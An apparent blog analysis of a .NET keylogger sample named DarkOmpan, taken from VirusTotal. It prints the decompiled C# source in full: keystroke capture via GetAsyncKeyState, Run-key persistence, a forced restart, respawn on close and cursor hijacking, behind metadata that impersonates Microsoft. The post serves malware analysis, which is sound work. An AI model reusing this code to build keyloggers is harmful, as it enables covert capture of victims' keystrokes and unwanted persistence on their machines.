Skip to main content

Analysis: Keylogger.DarkOmpan

Keylogger.DarkOmpan

The name comes from the namespace contained within the Keylogger: DarkOmpan

The sample was pulled from VirusTotal Intelligence, and has a current 1 / 59 detection ratio.

A quick scan using Yara shows the binary is a .net executable: Microsoft_Visual_Studio_NET.
Since .NET can be easily decompiled I simply used DnSpy in order to analyse the binary.

[assembly: AssemblyVersion("8.55.0.2")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("Microsoft SmartProtection")]
[assembly: AssemblyDescription("Microsoft© Protectioncore")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Microsoft SmartProtection")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(true)]
[assembly: Guid("65a50d4f-aa64-48ab-9ff0-c50cb2d4e64d")]
[assembly: AssemblyFileVersion("8.55.0.2")]
[assembly: TargetFramework(".NETFramework,Version=v4.6.2", FrameworkDisplayName = ".NET Framework 4.6.2")]

The fully decompiled class is as follows:

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using Microsoft.Win32;

namespace DarkOmpan
{
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        private static void Main(string[] args)
        {
            int i = 0;
            while (i < 1000)
            {
                i++;
                Thread.Sleep(125);
                Program.MoveCursor();
            }
        }

        // Token: 0x06000002 RID: 2
        [DllImport("user32.dll")]
        public static extern int GetAsyncKeyState(int i);

        // Token: 0x06000003 RID: 3 RVA: 0x00002084 File Offset: 0x00000284
        private static void startKeylogger()
        {
            string text = "";
            for (;;)
            {
                for (int i = 0; i < 255; i++)
                {
                    int asyncKeyState = Program.GetAsyncKeyState(i);
                    bool flag = asyncKeyState == 1 || asyncKeyState == -32767;
                    if (flag)
                    {
                        string str = ((char)i).ToString();
                        bool flag2 = i == 8;
                        if (flag2)
                        {
                            str = "back";
                        }
                        bool flag3 = i == 10 || i == 11 || i == 12 || i == 13 || i == 14;
                        if (flag3)
                        {
                            str = "strg";
                        }
                        text += str;
                        File.WriteAllText("C:\\Users\\root\\Desktop\\sos.txt", text);
                        break;
                    }
                }
            }
        }

        // Token: 0x06000004 RID: 4 RVA: 0x00002141 File Offset: 0x00000341
        private static void makeInvis()
        {
        }

        // Token: 0x06000005 RID: 5 RVA: 0x00002144 File Offset: 0x00000344
        private static void execonStartup()
        {
            RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            registryKey.SetValue("Microsoft_SmartProtection", Assembly.GetExecutingAssembly().Location);
        }

        // Token: 0x06000006 RID: 6 RVA: 0x0000217C File Offset: 0x0000037C
        private static void restart()
        {
            foreach (ManagementBaseObject managementBaseObject in new ManagementClass("Win32_OperatingSystem")
            {
                Scope = 
                {
                    Options = 
                    {
                        EnablePrivileges = true
                    }
                }
            }.GetInstances())
            {
                ManagementObject managementObject = (ManagementObject)managementBaseObject;
                ManagementBaseObject methodParameters = managementObject.GetMethodParameters("Win32Shutdown");
                methodParameters["Flags"] = 6;
                methodParameters["Reserved"] = 0;
                ManagementBaseObject managementBaseObject2 = managementObject.InvokeMethod("Win32Shutdown", methodParameters, null);
                int num = Convert.ToInt32(managementBaseObject2["returnValue"]);
                bool flag = num != 0;
                if (flag)
                {
                    throw new Win32Exception(num);
                }
            }
        }

        // Token: 0x06000007 RID: 7 RVA: 0x00002254 File Offset: 0x00000454
        private void DataWindow_Closing(object sender, CancelEventArgs e)
        {
            Process process = Process.Start(new ProcessStartInfo(Assembly.GetExecutingAssembly().Location, ""));
            e.Cancel = true;
        }

        // Token: 0x06000008 RID: 8
        [DllImport("user32.dll")]
        private static extern int ShowCursor(bool bShow);

        // Token: 0x06000009 RID: 9 RVA: 0x00002284 File Offset: 0x00000484
        private static void blockMouse()
        {
            Program.ShowCursor(false);
            Thread.Sleep(5000);
            Program.ShowCursor(true);
        }

        // Token: 0x0600000A RID: 10
        [DllImport("User32.Dll")]
        public static extern long SetCursorPos(int x, int y);

        // Token: 0x0600000B RID: 11
        [DllImport("User32.Dll")]
        public static extern bool ClientToScreen(IntPtr hWnd, ref Program.POINT point);

        // Token: 0x0600000C RID: 12 RVA: 0x000022A0 File Offset: 0x000004A0
        private static void MoveCursor()
        {
            Random random = new Random();
            Program.POINT point = default(Program.POINT);
            point.x = (int)Convert.ToInt16(random.Next(0, 800));
            point.y = (int)Convert.ToInt16(random.Next(0, 600));
            Program.ClientToScreen((IntPtr)0, ref point);
            Program.SetCursorPos(point.x, point.y);
        }

        // Token: 0x02000003 RID: 3
        public struct POINT
        {
            // Token: 0x04000001 RID: 1
            public int x;

            // Token: 0x04000002 RID: 2
            public int y;
        }
    }
}

 

A quick survey of the decompiled functions shows some pretty interesting things about the code:
1. The sample was probably submitted in error, or by someone who does not know how VirusTotal works.
2. If it is the latter, the author likely wanted to see the detection ratio of his keylogger.
3. The keylogger is VERY immature. Infact, the central keylogger functionality, startKeylogger, has not even been implemented in the main method.

Anyway it is still interesting to take a quick look at what might be the ‘next big thing’… In some alternative universe at least!

References

Sample SHA-256: cec914385580243e8c97a37480ada28d0b732c30bd6db21e085038b08e97b5a6
Virus-Total Analysis: https://virustotal.com/en/file/cec914385580243e8c97a37480ada28d0b732c30bd6db21e085038b08e97b5a6/analysis/

Acknowledgements

Many thanks to the folks at VirusTotal